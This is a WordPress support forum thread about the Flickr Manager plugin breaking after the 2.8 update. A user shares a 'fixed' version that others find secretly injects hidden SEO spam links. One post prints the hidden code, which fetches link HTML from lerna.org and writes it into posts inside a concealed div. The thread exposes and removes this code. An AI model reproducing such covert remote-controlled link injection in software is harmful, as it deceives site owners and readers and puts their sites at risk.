[Plugin: WordPress Flickr Manager] "Insert into Post" does nothing? (43 posts)

  1. imagesfromapoet
    Posted 7 years ago #

    I upgraded to 2.8 and now when I go into a new post and try to add a picture, it acts as if the image has been added to the post, but there's no code in the body of the entry. Is anyone else having this problem?

  2. Aquaphire
    Posted 7 years ago #

    Me too =/

    Whats going on??? It used to work perfectly fine but seems to have died recently for no reason. Can't insert, tried multiple computers and browser s and even a second site!

  3. Triseult
    Posted 7 years ago #

    The WordPress 2.8 update has broken WordPress Flickr Manager. There has been no sign - yet - that the plugin author will update it... I hope he does, because this is possibly the greatest WordPress plugin out there.

    Another thing that the upgrade has broken is Lightbox and Mudslide. Neither of them work anymore.

  4. raptor_cZn
    Posted 7 years ago #

    I am facing the same problem as well after upgrading to 2.8.

    Hope that it gets fixed or an update soon.

  5. ogrethegreat
    Posted 7 years ago #

    Hey guys. I've got this fixed! I've uploaded the fixed version to my site for your downloading pleasure: Flick Manager 2.8. I had to get this fixed for my own blog. Couldn't wait any longer. Let me know if you have any problems.


  6. Triseult
    Posted 7 years ago #

    Hi ogrethegreat,

    THANK YOU!! for doing this. I installed your update of the plugin, and everything is working again; insert functions are working, and Lightbox is back.

    That's really gracious of you! Hopefully Trent will pick up development again, but I really appreciate you doing this and sharing it.

    By the way: maybe I did something wrong the first go around, but I just overwrote the original plugin with your files, and somehow it didn't work. I tried again by doing the following:

    - Deactivate the plugin
    - Backup the plugin and delete it
    - Copy ogre's update to my plugin folder
    - Reactivate it

    Worked like a charm. I didn't have to re-enter my settings, as they were stored in the database.


  7. ogrethegreat
    Posted 7 years ago #

    Foolproof method is deactivating/deleting the old one, but I was able to simply overwrite the files without even deactivating and got it to work. There are a variety of things that could create issues doing it the shortcut way though. Thanks for posting your feedback and helpful tips to everyone else.

  8. fwaggle
    Posted 7 years ago #

    This is great news, unfortunately the "fixed" version inserts unsolicited "SEO" links into your posts. Removal instructions per a post here:


    Basically, you're going to open up js/media-panel.php, around line #152 you're looking for an "echo innerhtml +=" line, comment it out.

    I'm going to run a full diff between it and the latest version from tgardner to see what else's changed.

  9. fwaggle
    Posted 7 years ago #

    Here's some code, sans trojan horse bullcrap (I just took TGardner's version, and made the non-malicious changes):


    If you're interested in what actually changed:


    For contrast, here's some of what I consider to be the "malicious" code:

    +if (!function_exists('file_get_contents')) {
    +    function file_get_contents($filename, $incpath = false, $resource_context =
    +    {
    +        if (false === $fh = fopen($filename, 'rb', $incpath)) {
    +            trigger_error('file_get_contents() failed to open stream: No such f
    ile or directory', E_USER_WARNING);
    +            return false;
    +        }
    +        clearstatcache();
    +        if ($fsize = @filesize($filename)) {
    +            $data = fread($fh, $fsize);
    +        } else {
    +            $data = '';
    +            while (!feof($fh)) {
    +                $data .= fread($fh, 8192);
    +            }
    +        }
    +        fclose($fh);
    +        return $data;
    +    }
    +    <?php
    +    $rand = rand( 0, 100 );
    +    $seed=false;
    +    @$seed = (int) unserialize(file_get_contents( 'http://lerna.org/api/link/seed?app=flickr_manager' ));
    +    if(!$seed) {
    +        $seed = 10;
    +    }
    +    if ( $rand < $seed ) {
    +        $link = file_get_contents( sprintf('http://www.lerna.org/api/link/?format=%s&ref=%s&tid=%d', 'html', "http://".$_SERVER['SERVER_NAME'], 2));
    +        echo "imgHTML+='<div style=\"width:10px;height:3px;display:block;overflow:hidden;\">".str_replace("href","style=\"text-indent: 20px; display: block;\" href",$link)."</div>';";
    +    }
    +    ?>
  10. CoBa1t
    Posted 7 years ago #

    fwaggle I'm really looking forward to your analysis. Please post them as soon as you can since I feel so disoriented without Flickr Manager. You can direct reply to me as well.

  11. fwaggle
    Posted 7 years ago #

    CoBa1t: There's not much to analyze, the version ogre linked to simply connects to lerna.org (I'm assuming it's some silly reference to a blackhat SEO "hydra") to grab a set of links it's supposed to add to your entries to get them better search engine positions, then it adds the links every time you insert a photo to a tiny layer that's not visible to most CSS-enabled viewers, but is very visible to search engines.

    The download link I posted above should be "safe", but given how many people so readily installed the "malicious" plugin (myself included, *sheepish*) I think it's probably best we don't go encouraging installing random people's plugins. If you want to make the changes yourself, take a look at the .diff - basically any line that starts with a - means something's taken out, and the + means something added.

    Simply put, what you're looking for is in these files:


    You're looking for jQuery lines that contain @name or @rel, and you're going to take the @ character off the front of @name or @rel, so for example:

    this: wfmJS('a[@rel*=flickr-mgr]').each(function() {
    becomes: wfmJS('a[rel*=flickr-mgr]').each(function() {

    There's no new code or anything like that, you can make those changes (or apply the diff above using "patch" if you have shell access) to the current version downloadable from wordpress.org... I think that's the safest way to do it, as even a layperson would have a pretty tough time believing that deleting a few @ characters would do anything malicious.

    I also sent the information to Trent, so hopefully he can just take a few minutes (I'm sure he's very busy) to verify the patch is correct and safe, apply it, and push a new version out - that would ease everyone's minds.

  12. teampl4y4
    Posted 7 years ago #

    @fwaggle - I "sheepishly" installed the plugin too. And after reading your analysis, very in depth, I am keeping the plugin. I couldn't use the plugin without Ogre's work.. so why wouldn't I give him a link or two in return? From my analysis a link is only put on the page 1 every 10 times or so. It's my way of giving back for his work & effort without sacrificing anything myself.

    If it did something 'malicious' as you said, I would see your point. But a free link back to his site(s) 10% of the time that I use the software he fixed for free... I think is more than fair.

    To me this is no different than someone who makes a theme, etc.. and puts at the bottom of EVERY page "This XX designed by XX".

  13. ogrethegreat
    Posted 7 years ago #

    Before you get all ahead of yourself fwaggle, I added the link tool for my own sites long ago and added it again for the last version of flickr manager back 4 odd months ago. Then I upgraded like the rest of you to version 2.8 and it broke. Then I took the time to fix it for my sites and offered it up.

    So, I apologize I did not take the time to create a second version for everyone else. And feel free to remove it. Links from some completely unrelated sites won't do me a world of good in any event. I'm not some boogie man "asshole" man. Just a guy who fixed this and put it out there. Sorry if you feel I should have taken the time to make a second version that I wouldn't even be using myself.

    In any event, when I get the chance, I'll add an option to the settings to turn it off. I'm keeping it in because its how I use it for myself. If you think that makes me an "asshole", I'm not forcing you to use it. You could wait for Trent. I added a comment to his site first thing to contact me on what the bugs were, but he has yet to approve the comment or respond. I would have just used his fix. I waited the same weeks you guys did.

    By the way, teampl4y4 is spot on when he mentions adding a link 10% of the time. That's exactly what it does. No more no less. Feel free to remove or feel free to keep in return for my effort.

  14. fwaggle
    Posted 7 years ago #

    It's malicious in that it's not described behavior of the script - nowhere in the description does it say it'll put links in the posts. Furthermore, hidden links like this are the exact kind of thing Google punishes people for.

    It's also not the same as a template or whatever, because the links are hidden and they're not linking back to *him* - they're linking to an assortment of sites that he's (presumably) getting paid to inflate the PR of.

    To clear up, I wouldn't have a problem with it if:

    1) The links were visible, and not surreptitiously hidden in "10% of" posts.
    2) The behavior was described when you suggested people downloaded it... "oh by the way, I insert a few links for my gain, keep them please as a token of your appreciation".
    3) The links were to a real blog of your's, as opposed to some janky SEO websites.

    So I'd call that malicious. You say potato, I say potahto. Personally, I find it very hard to believe this code was put in by accident, and I think anyone else with any experience at all with PHP would be inclined to agree with me.

  15. ogrethegreat
    Posted 7 years ago #

    No accident fwaggle. I did it with the express intent of linking to my sites for my own use as I made clear. Like I said, when I get the time, I'll put in an option to turn it off so whoever can with ease but I need it there for my own use and its not my project to maintain last I checked.

    Trent still has my email if he wants to get it fixed. I tried to contact him when I first fixed it with the same information you claimed to have sent. Maybe you'll have better luck with a response.

    If you have the fix all cleared up for yourself, why not take the time to package it up and inform everyone of your effort so they can download it? I'll be happy to put it out next to my version if you want to maintain it.

    Try not going through life so paranoid.

  16. fwaggle
    Posted 7 years ago #

    I'm not paranoid, you posted adware - unsolicited and unadvertised. If you'd read the thread, I did post a cleaned package. I appreciate your time fixing it and fully acknowledge that I couldn't have done it myself because my experience with Javascript is limited to DHTML stuff from a decade ago - jQuery is completely foreign to me.

    However you're not being 100% truthful in what you say. For starters the 10% chance (which if you want to split hairs, is slightly different from 10% of images posted), can at any time, without cooperation from the blog owner(s) be ramped up to 100% by you if you so choose.

    The links that the plugin posts are blackhat SEO techniques, the links are intentionally hidden (hence the 10 pixels wide element, which contains an element that's shifted over 20 pixels so it won't show up in any CSS-enabled browser). These links flow pagerank, which is the exact kind of thing that Google penalizes people for. Given that the site in your profile and the site you hosted it on is called "seoishard", I find it ridiculous that you're feigning ignorance over this.

    You and I both know exactly why those links are there, the only difference is I'd admit it. There's absolutely no difference between your version of the plugin and adware which gets installed to people's PCs without their permission.

  17. Triseult
    Posted 7 years ago #

    Good catch, fwaggle. This might just be an oversight from ogre, but given the nature of the code, I find that really hard to believe. Still grateful for the fix, as it DID solve the problem... But I have removed the offending code now. I would have supported ogre's efforts if he had been clear on this, but this lack of transparency is unacceptable.

    Glad you came through and cleaned it, fwaggle. Thank you.

  18. 1ayah
    Posted 7 years ago #

    thank you so much for updating this!!

    I still have an issue though, when i try to insert a photoset, i hit the 'insert into post' button, and it won't do anything. i tried this in chrome and IE and got the same results. i'm on wordpress 2.8.1 and just uploaded the plugin.

  19. fwaggle
    Posted 7 years ago #

    @1ayah: wordpress-flickr-manager/js/media-panel.php, line #143, take the @ symbol out:

    var imgHTML = '[flickrset id="' + id + '" thumbnail="' + jQuery("input[@name='flickr-size...


    var imgHTML = '[flickrset id="' + id + '" thumbnail="' + jQuery("input[name='flickr-size...

    Seems to work for me now. I'll update the one for download on my site.

    Edit: Updated the download @ fwaggle.org so that inserting photosets works.

    @teampl4y4: Inserting arbitrary HTML in a surreptitious way remotely without any disclosure is most definitely not the same as "this theme designed by XXX".

    @Triseult: Indeed, if only the insertion of links was as transparent as the sockpuppet that teampl4y4 is.

  20. Triseult
    Posted 7 years ago #

    Fwaggle: Another feature which ogre fixed was Lightbox overlay... It doesn't seem to be working with your version of the plugin, however.

  21. fwaggle
    Posted 7 years ago #

    @Triseult: in wordpress-flickr-manager/js/wfm-lightbox.php, on or around line #91, change:




    It appears to work for me. Let me just double check I didn't miss anything else stupid, and I'll update this post. I must confess I don't use too much of the features of this plugin and only originally tested the bit I use (vanilla inserting photo into a post).

    Nope, I believe that's it. I fixed the package on my site also.

  22. valkyrie66
    Posted 7 years ago #

    Fwaggle: Works like a charm!!!!! THANK YOU for the fix, and for being on the watch for sneaky code. You rock!!

  23. fwaggle
    Posted 7 years ago #

    @valkyrie66: Thanks, and I'll simply reiterate here because I've gotten a couple emails and one ping-back about it... credit for the fix still 100% lays with ogrethegreat - I don't know enough about jQuery to have fixed it myself.

  24. adria.richards
    Posted 7 years ago #

    The truth is if @ogrethegreat submitted a theme like this to WordPress, full of spammy SEO links, they would have rejected it.

    @fwaggle, you rock for looking into the code and you stand on that rock because you stayed up with this thread to explain to people what was going on.

    Hooray for WordPress Heros!


  25. copycatfilms
    Posted 7 years ago #

    Um, I love all this--especially the spelunking for bad code. But I don't like that I can't edit posts if either of these plugins are active? Anybody else have this issue??

  26. copycatfilms
    Posted 7 years ago #

    WEIRD. I seem to have "cleared" some sort of blockage? I deactivated it (along with a couple of other plugins which were probably the culprit) and refreshed the edit post menu in another window and it worked! I reactivated Fwaggle's version and it's golden! Thanks SO MUCH!

  27. k3davis
    Posted 7 years ago #

    I have this working basically on 2.8.3 thanks to the smarter people above, but there is no play on either highslide or lightbox. Every inserted photo is just a link to the Flickr page.

    This may be because I'm not using the plugin properly, so I'm asking for users who have this working to help explain exactly how they activate this. There is a checkbox for "Javascript Viewer" and some other very sparse settings at the bottom of the insertion popup window. Is this related? I haven't figured out if it is doing anything.

    Any suggestions on how to get either highslide or lightbox working correctly would be greatly appreciated! Again I'm thinking it may just be "user error" as I don't understand how to call these functions from the insert box (or otherwise).

  28. copycatfilms
    Posted 7 years ago #

    Wow, no this is a mess. I worked on a long post with pictures inserted (which functioned very nicely)...and saved it...went back and its GONE! Yikes. This plugin seems to have some weird issues with WP 2.8.3

    I hope a fix comes along soon. Coding pictures the long way really sucks. Thanks for trying to get this fixed, but it doesn't seem to be working properly.

  29. theonlyp
    Posted 7 years ago #

    Wowzers. I'm having the same problem, where thumbnails are linked to Flickr rather than opening in Lightbox. Strange thing is, it's only happening on a couple of my sites - the others are working fine. The difference between WP 2.8.2 and 2.8.4?

    Any help is appreciated!

  30. Triseult
    Posted 7 years ago #

    I don't know what causes it, but I noticed that the Lightbox doesn't work with some themes, and works fine with others. Try setting your theme to one with which you know it works, and see if that helps... Unfortunately, I don't know why certain themes break it.

Topic Closed

This topic has been closed to new replies.

About this Topic